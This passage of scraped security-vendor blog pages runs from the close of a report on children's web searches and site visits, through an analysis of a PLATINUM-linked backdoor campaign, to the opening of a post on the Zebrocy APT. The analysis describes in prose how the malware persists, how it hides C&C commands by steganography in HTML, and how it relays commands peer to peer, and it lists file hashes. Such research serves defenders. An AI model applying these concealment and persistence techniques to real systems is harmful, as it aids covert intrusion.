As for search queries, Russian-speaking children most often searched for “ВК” (VK), “инстаграм” (instagram), and “скайп” (skype). Popular search queries in English were “facebook,” “instagram,” and “tiktok.” In Japanese, the most common searches were for stickers for the messenger Line. And in Arabic, they were for تويتر (Twitter) and Facebook.

Note that the share of search queries related to online communication decreased in most languages, as did visitor traffic to sites in this category. Their share in English decreased by 3.6 p.p. to 6.72%, and in Russian by 4.35 p.p. to 9.11% against the previous reporting period.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries related to one of the four most popular social networks, May 2018 – May 2019 (download)

Electronic Commerce

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Electronic Commerce category in different regions, May 2018 – May 2019 (download)

Another category of resources more popular this year than last is Electronic Commerce. The most popular sites are Aliexpress, Amazon, and eBay. Children’s interest in the online store Aliexpress is growing year on year. This report has already noted the upward trend in the popularity of services of Chinese origin; for example, the social network TikTok belongs to the Chinese Internet company ByteDance.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Electronic Commerce category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

The most significant rise in the popularity of online stores over the past year came in CIS countries. The Top 3 sites by number of visits are Avito, Aliexpress, and Wildberries.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Electronic Commerce category in different countries, May 2018 – May 2019 (download)

The country-specific data confirms that children in Belarus and Russia show most interest in online shopping.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the online shopping topic in different languages, May 2018 – May 2019 (download)

What exactly children were looking for is revealed in the search queries. In Japanese, the most frequent searches were for products from the Rakuten store and the Japanese version of Amazon, as well as candy from the 7-Eleven store. The most popular stores in German were Zalando, Saturn, eBay Kleinanzeigen, and Tiger; in English, Amazon, eBay, Aliexpress, Ikea, and Asos; and in Russian, Aliexpress, Авито (Avito), Юлу (Yulu), and Детский мир (Children’s World).

As for brands, in this reporting period children searched for Nike, Adidas, Samsung, Gucci, Vans, Supreme, Zara, and Bershka. Product-wise, the younger generation showed interest in the iPhone X, iPhone 7, Huawei p20, Samsung S7, Nike and Adidas footwear, and various books.

Video Games

Compared to last year, the share of this category decreased almost threefold. This does not mean that children are losing interest in games, since some of the content they watch on YouTube is devoted specifically to games, including walkthroughs, analysis, and reviews.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Share of websites in the Video Games category in different regions, May 2018 – May 2019 (download)

Not for the first year, the region with the largest gaming category share is Oceania. And this year we saw growth: from 11.03% to 13.63%. The most popular gaming sites in Oceania are roblox.com, blizzard.com, steamcommunity.com, ubisoft.com, and ea.com.

In North America, the share of visits to gaming sites from PCs dropped from 13.05% to 7.70%. The most popular sites in this region are roblox.com, blizzard.com, and twitch.tv.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Video Games category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

The share of this category decreased in other regions, too. For instance, it fell from 10.02% to 4.19% in Europe, from 3.96% to 1.24% in Latin America, and from 3.03% to 2.81% in the CIS. In others, meanwhile, it increased: from 1.49% to 2.04% in the Arab world, and from 2.93% to 4.71% in Asia.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Video Games category in different countries, May 2018 – May 2019 (download)

In the diagram, we see that in Australia (part of the Oceania region) the Video Games category has a greater share than in other countries (12.74%). It is followed by Germany (10.59%), which last year came mid-table, but this time ousted the UK (8.21%) from second place.

But the share of this category is still on a downward trend. This is likely due to the increased popularity of mobile games, which now attract children more than PC games. Overall, the mobile games market is growing year on year.

That said, PC games are still popular, although many of them have been adapted to mobile platforms and consoles. One example is Minecraft, which, judging by kids’ search queries, is still in high demand.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the Video Games topic in different languages, May 2018 – May 2019 (download)

Unsurprisingly, the lion’s share of game-related search queries are in English, since most games have English-language titles. The most popular queries in English this past year were: fortnite, roblox, minecraft, epic games (the publisher of Fortnite), steam, twitch, discord, overwatch, and pubg.

It is worth noting that many of the top search queries in English were related to Fortnite, for example: fortnite tracker, fortnite download, fortnite battle royale, and epic games fortnite.

Fortnite is available on almost all possible gaming platforms (Microsoft Windows, macOS, Xbox One, PlayStation 4, iOS, Android, Nintendo Switch). The gameplay originally consisted in studying the in-game map, collecting resources, building fortifications, and simply surviving (including defending yourself against night-time zombies). But then the developers released the multiplayer deathmatch mode Fortnite Battle Royale, which later turned into a full-fledged game and became even more of a hit than the original. The queries “fortnite mobile” and “fortnite android” confirm our suspicion that children are increasingly switching allegiance to mobile games.

In addition to PC and mobile games, children were interested in consoles. They searched for Nintendo Switch, PS4, Xbox, and Playstation.

Adult Content

Many people worry about the extent to which children are interested in pornography and erotica.

In terms of percentage of all website categories visited from PCs, the Adult Content category in the past reporting year accounted for 2.08%, up 1.34 p.p. on last year (0.74%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Share of websites in the Adult Content category in different regions, May 2018 – May 2019 (download)

The statistics by region show that the largest share of visits to adult sites belongs to Latin America (4.28%). In second place is South Asia (2.74%), with Asia in third place on 2.26%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Adult Content category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

Compared to last year, the share of adult sites in Latin America climbed from 0.63% to 4.28%. In the CIS, we also saw an increase: from 0.48% to 2.09%. The most popular resources in the Adult Content category, as previously, are pornhub.com, xnxx.com, and livejasmin.com. Interestingly, in some regions this category became less popular. For example, it fell from 1.18% to 0.84% in Europe.

This is not the first year that Asia has posted an increased interest in the topic of pornography and erotica. Interestingly, this year it declined from 2.72% to 2.26%, but still remained quite high compared to other regions.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Share of websites in the Adult Content category in different countries, May 2018 – May 2019 (download)

Children in Japan are the most likely to try to visit (or actually visit if there is no parental block) porn sites – 7.82% of all website categories accessed by children from PCs. In second place is Brazil (7.34%), where children also show interest in adult content. Third place goes to Mexico (5.45%). The high figures in these countries mean that Asia and Latin America are the world’s leading regions in this category.

The language with the largest share of all porn-related search queries is Portuguese.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries related to adult content in different languages, May 2018 – May 2019 (download)

In second place is Arabic, which last year accounted for the largest share of porn-related search queries (34.32%). Search queries in German came third.

Of interest here is not so much the sites that children visit from PCs, but the search queries they make; as we have noted in previous reports, children prefer viewing porn from mobile devices than PCs. Therefore, it would not be amiss to compare the search figures for the past two years:

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of Adult Content search queries in different languages, May 2017 – May 2018 and May 2018 – May 2019 (download)

Alcohol, Tobacco, Drugs

In the past two years, we have witnessed a downward trend in the number of visits by children worldwide to sites in the Alcohol, Tobacco, Drugs category.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Alcohol, Tobacco, Drugs category in different regions, May 2016 – May 2017, May 2017 – May 2018, and May 2018 – May 2019 (download)

Another reason for the decrease in the number of visits to sites in this category may be the loss of interest in electronic cigarettes and vapes. Whereas two or three years ago, vaping was all the rage, it is now a niche activity.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Alcohol, Tobacco, Drugs category in different regions, May 2018 – May 2019 (download)

All the same, children in North America and Oceania are the most likely to visit sites related to alcohol, tobacco, or drugs. But in Europe, the figure fell against previous years. Interestingly, despite the regional figures, the share of visits to alcohol-, tobacco-, and drug-related sites in Japan (2.21%) is higher than in other countries. The US is in second place (1.59%), and Germany is in third (1.00%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Alcohol, Tobacco, Drugs category in different countries, May 2018 – May 2019 (download)

We cannot say for sure that children intentionally visit sites with such content, since the search queries that best reflect kids’ interest in the subject do not reveal any increase in such interest.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the Alcohol, Tobacco, Drugs topic in different languages, May 2018 – May 2019 (download)

That said, in Chinese, children searched for 酒, 毒品 (alcohol, drugs); in German, “rauchen” (smoking), “bier” (beer), and “zigaretten” (cigarettes); in Portuguese, “maconha” (marijuana) and “caipirinha” (a Brazilian cocktail); and in Russian, “наркотики” (drugs), “алкоголь” (alcohol), and “сигареты” (cigarettes).


Besides the categories examined in this report, our investigation of search queries revealed other topics of interest to kids. For instance, search queries related to online translators are among the most popular.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries related to the topic of online translation in different languages, May 2018 – May 2019 (download)

In French, children searched for “traduction francais anglais” and “traduction espagnol français”; in Spanish, “traductor español ingles” and “traductor español frances”; in Italian, “traduttore inglese italiano” and “traduttore francese italiano”; and in German, “google übersetzer” and “englisch deutsch”.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of sports-related search queries in different languages, May 2018 – May 2019 (download)

Portuguese-speaking children showed most interest in the topic of sport. Their search queries included Brazilian soccer stars and match results. Sports were also of great interest to children in the Arab world and Spanish-speaking countries. The vast majority of queries were soccer-related.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of celebrity-related search queries in different languages, May 2018 – May 2019 (download)

Children also searched for information about real-life celebrities and various fictional characters. Interestingly, whatever the language, children most often searched for the same names: Harry Potter, Hitler, Donald Trump, and Kim Kardashian.

Alongside entertainment, children also use the Internet for educational purposes. The largest share of queries on the education topic were in Russian.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the Education topic in different languages, May 2018 – May 2019 (download)


Every year, we see increasing numbers of children going online from mobile devices. Whereas this trend used to be more pronounced in Western countries than in the Arab world and Latin America, kids in these regions too are starting to switch to mobile platforms.

This is evidenced, above all, by the decrease in the number of visits to social networking sites from PCs. Developers are actively supporting users’ transition to mobile devices, adapting their services to smartphone screens. New social networks aimed exclusively at smartphones are becoming extremely popular with children and teenagers, who pick up innovations before adults do. Last year, for instance, the world of social networks was rocked by TikTok; Instagram and SnapChat are also increasing their audiences. Despite remaining the most popular social network in the world, Facebook is attracting ever fewer children and teenagers in the West.

Games, just like social networks, are increasingly shifting to mobile platforms. A good example is Fortnite, which children prefer to play on mobile devices and is (according to search queries) more popular than Roblox and Minecraft.

When it comes to online shopping, children still favor PCs. This is not surprising, since not all online stores have a user-friendly app or mobile version. Not for the first year did we see a rise in the popularity of the Software, Audio, Video category. And it was the first year that it dislodged the Online Communication from the top of the leaderboard. Children increasingly prefer to spend time watching videos on YouTube, and in addition to clips on the video hosting site, they also showed interest in Game of Thrones, the series Riverdale, and the latest Avengers.

We recommend using parental control to keep tabs on what children are looking at. Kaspersky Lab’s parental control component forms part of the Kaspersky Internet Security and Kaspersky Total Security solutions. We also have a separate product, Kaspersky Safe Kids, which not only prevents children from accessing undesirable websites, but notifies parents about what their children have been searching for online, and helps track their location and manage their gadget time.

2019. június 5.

Platinum is back

In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels. The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.

As a first stage the operators used WMI subscriptions to run an initial PowerShell downloader which, in turn, downloaded another small PowerShell backdoor. We collected many of the initial WMI PowerShell scripts and noticed that they had different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption (also different for each initial loader) and different active hours (meaning the malware only worked during a certain period of time every day). The C&C addresses were located on free hosting services, and the attackers made heavy use of a large number of Dropbox accounts (for storing the payload and exfiltrated data). The purpose of the PowerShell backdoor was to perform initial fingerprinting of a system since it supported a very limited set of commands: download or upload a file and run a PowerShell script.

At the time, we were investigating another threat, which we believe to be the second stage of the same campaign. We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc. The backdoor also has a few very interesting features of its own. For example, it can hide all communication with its C&C server by using text steganography.

After deeper analysis we realized that the two threats were related. Among other things, both attacks used the same domain to store exfiltrated data, and we discovered that some of the victims were infected by both types of malware at the same time. It’s worth mentioning that in the second stage, all executable files were protected with a runtime crypter and after unpacking them we found another, previously undiscovered, backdoor that is known to be related to PLATINUM.

Our paper only includes a description of the two previously undiscovered backdoors while the full report is available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com).

Steganography backdoor

The main binary backdoor is installed with a dedicated dropper. When the dropper is run, it decrypts files that are embedded into its “.arch” section:

Next, it creates directories for the backdoor to operate in and saves the malware-related files in these. It normally uses paths like those used by legitimate software.

Typically, the malware drops two files: the backdoor itself and its configuration file.

After this, the dropper runs the backdoor, installs it to enable a persistence mechanism and removes itself. The configuration file always has a .cfg or .dat extension and contains the following options, encrypted with AES-256 CBC and encoded:

  • pr – stands for “Poll Retries” and specifies the interval in minutes after which the malware sends the C&C server a request for new commands to execute;
  • ht – unused;
  • sl – specifies the date and time when the malware starts running. When the date arrives, the malware clears this option.
  • opt – stands for “Office Hours”. This specifies the hours and minutes during the day when the malware is active;
  • die – stands for “Eradicate Days”. This specifies how many days the malware will work inside the victim’s computer;
  • Section “p” lists malware C&C addresses;
  • Section “t” lists legitimate URLs that will be used to ensure that an internet connection is available.

The main backdoor is implemented as a dynamic link library (DLL) and exports a function with the name “NSPStartup”. After dropping it, the installer registers the backdoor as a winsock2 namespace provider with the help of the WSCInstallNameSpace API function and runs it by calling the WSCEnableNSProvider.

As a result of this installation, during initialization of the “svchost -k netsvcs” process upon system startup, the registered namespace provider will be loaded into the address space of the process and the function “NSPStartup” will be called.

C&C interaction

Once up and running, the backdoor compares the current time against the “Eradicate Days”, activation date and “Office Hours” values, and locates valid proxy credentials in “Credential Store” and “Protected Storage”.

When all the rules are fulfilled, the backdoor connects to the malware server and downloads an HTML page.

On the face of it, the HTML suggests that the C&C server is down:

However, this is because of the steganography. The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <--1234567890> tag (see below).

On line 31, the attributes “align”, “bgcolor”, “colspan” and “rowspan” are listed in alphabetical order, whereas on line 32, the same attributes are listed in a different order. The first steganography technique is based on the principle that HTML is indifferent to the order of tag attributes. We can encode a message by permuting the attributes. Line 31 in the example above contains four tags; the number of permutations in the four tags is 4! = 24, so the line encodes log2(24) = 4 bits of information. The backdoor decodes line by line and collects an encryption key for the data, which is placed right after the HTML tags in an encoded state too, but using a second steganography technique.

The image above shows that the data is encoded as groups of spaces delimited with tabs. Each group contains from zero to seven spaces and the number of spaces represents the next three bits of data. For example, the first group on line 944 contains six spaces, so it will be decoded as 610 = 1102.

Decryption of the decoded data using the decoded AES-256 CBC key is a logical continuation.

The result is a list of commands to execute, protected the same way as the backdoor configuration file:

Raw command data extracted from the HTML page

An interpretation of the raw commands extracted from the HTML page after decryption


The backdoor that we’ve discovered supports the uploading, downloading and execution of files, it can handle requests for a process list and directory list, upgrade and uninstall itself and modify its configuration file. Each command has its own parameters, e.g. the C&C server that it requests to download or upload files, or split a file while uploading.

Config manager

While investigating further, we found another tool that turned out to be a configuration manager – an executable whose purpose was to create configuration and command files for the backdoors. The utility can configure more than 150 options.

For example, below is the result of executing the showcfg command.

The second command it supports is updatecfg, whose job was to put values specified by the operator into the configuration file.

Also, the config manager supports Upload, Download, Execute, Search, UpdateConfig, AddKeyword, ChangeKeywordFile, ChangeKey, Upgrade and Uninstall commands. After executing any of these it creates a command file, protected the same way as the configuration file, and stores it in the “CommandDir” directory (the path is specified in the configuration, option 11). As described in the ‘Steganography backdoor’ section, this backdoor doesn’t handle command files and doesn’t support commands such as ChangeKeywordFile and ChangeKey, so we figured that there was another backdoor, which made a pair with the config manager we had found. Although it would appear such a utility should run on the attacker side, we found a victim infected with this and a corresponding backdoor located in the vicinity. We called it a P2P backdoor.

P2P backdoor

This backdoor shares many features with the previous one. For example, many of the commands have similar names, both backdoors’ configuration files have options with identical names and are protected the same way, and the paths to the backdoor files are similar to legitimate ones. However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.

C&C interaction

This backdoor has the ability to sniff network traffic. After the backdoor is run, it starts a sniffer for each network interface, in order to detect a specially structured packet, which is sent to the victim’s ProbePort specified in the configuration. When the sniffer finds a packet like that, it interprets it as a request to establish a connection and sets TransferPort (specified in the configuration) to listening mode. The requester immediately connects to the victim’s TransferPort and both sides perform additional checks, exchanging their encryption keys. Then the connection requester sends commands to the victim, and the victim processes these interactively. This approach allows the backdoor to maintain listening mode without keeping any socket in listening mode – it only creates a listening socket when it knows that someone is trying to connect.


The backdoor supports the same commands as the steganography backdoor and implements an additional one. The backdoor leverages the Windows index service and can search files for keywords provided by the attacker. This search can be initiated by an attacker request or on a schedule – keywords for a scheduled search are stored in a dedicated file.

All commands are supplied to the backdoor through command files. The command files are protected the same way as the config (see below).

This consists of a command id (id), a command date (dt), a command name (t) and arguments (cmd).

The creators of the malware also provide the ability to combine infected victims into a P2P network. This can help the attacker, for example, when two infected victims share the same local network, but only one of them has access to the internet. In this case, the attacker can send a command file to the unreachable victim via the reachable one. The instruction for the reachable victim that the command is intended for the other host is placed directly inside the command file. When the attacker prepares the file, a list of infected hosts involved in transferring the file to the destination is included as the h1, h2, h3, etc. options. The order in which the command file will be transferred through the victims to the destination host is included as the p1, p2, etc. options. For example, if the p1 option equals ‘2->3->1’ and the p2 option equals to ‘2->3->4’ the command file will be delivered to the hosts with the indexes 1 and 4 through hosts 2 and then 3. Each host is described as follows: %Host IP%:%Host ProbePort%:%Host TransferPort%.


We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and here is proof: the actors used two interesting steganography techniques in this APT. One more interesting detail is that the actors decided to implement the utilities they need as one huge set – this reminds us of the framework-based architecture that is becoming more and more popular. Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active.


This list includes only IoCs related to the described modules of the attack. All IoCs are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com)

Steganography backdoor installer:

  • 26a83effbe14b63683f0c3e0a3f657a9
  • 4b4c3b57416c03ca7f57ff7241797456
  • 58b10ac25df04a318a19260110d43894

Obsolete steganography backdoor launcher:

  • d95d939337d789046bbda2083f88a4a0
  • b22499568d51759cf13bf8c05322dba2

Steganography backdoor:

  • 5591704fd870919930e8ae1bd0447706
  • 9179a84643bd6d1c1b8e6fe0d2330dab
  • c7fda2be17735eeaeb6c56d30fc86215
  • d1936dc97566625b2bfcab3103c048cb
  • d1a5801abb9f0dc0a44f19b2208e2b9a

P2P backdoor:

  • 0668df90c701cd75db2aa43a0481718d
  • e764a1ff12e68badb6d54f16886a128f

Config manager:

  • 8dfabe7db613bcfc6d9afef4941cd769
  • 37c76973a55134925c733f4f50108555
2019. június 3.

Zebrocy’s Multilanguage Malware Salad

Zebrocy is Russian speaking APT that presents a strange set of stripes. To keep things simple, there are three things to know about Zebrocy

  • Zebrocy is an active sub-group of victim profiling and access specialists
  • Zebrocy maintains a lineage back through 2013, sharing malware artefacts and similarities with BlackEnergy
  • The past five years of Zebrocy infrastructure, malware set, and targeting have similarities and overlaps with both the Sofacy and BlackEnergy APTs, yet throughout that time it has remained different from both of those groups

We originally described a rare “Zebrocy Delphi payload” in late 2015 private reports. That malware set, activity, and infrastructure has greatly expanded. Its malware set has been coded in a half dozen languages or so. Related activity has gone on for years, spearphished hundreds of government, foreign affairs related, and military related targets, and initially was regarded as a Sofacy subset.

Essentially, in our SAS2019 presentation “Zebrocy’s Multilanguage Malware Salad”, we publicly provided for the first time original insights on Zebrocy and its characteristics, based on five years of research and private reports on this group:

  • Game is on – a small new Zebrocy spearphish wave with a new Golang downloader variant was sent out the week before SAS2019
  • Consistent profiling and process enumeration reporting behavior has been redeveloped and redeployed in Zebrocy backdoors across five+ years
  • Multiple bespoke second stage implants perform credential harvesting based on stage one process enumeration
  • Copy-and-paste coding tendencies
  • Complex overlaps with Sofacy and BlackEnergy/GreyEnergy over five years, suggesting a supportive role as a sub-group
  • Initial malware development and deployment lineage with BlackEnergy stretches back to 2013

While Zebrocy has never presented 0day exploits, this group’s lineage comes from not-so-humble BlackEnergy and Sofacy beginnings. The group presents an agile and capable malware set, it spearphishing and intrusion activity surged in volume in 2018, and their efficacy requires network defenders’ attention.

Zebrocy shares data points and crosses lines with other clusters of activity in unique and unexpected ways. Zebrocy initially shared limited infrastructure, targets, and interests with Sofacy. Zebrocy also shared malware code with past BlackEnergy/Sandworm; and targeting, and later very limited infrastructure with more recent BlackEnergy/GreyEnergy. Oddly, Turla deployed spearphish macros almost identical to previous, non-public Zebrocy code in 2018.

It’s fantastic to see some of these same points being repeated publicly by other research teams. A previous claim that Zebrocy distributed Sofacy’s XAgent as a second stage implant remains unsubstantiated but now is replaced with findings identical to these following the SAS2019 presentation, so it seems we are all slowly getting on the same page.

A first course with new additions

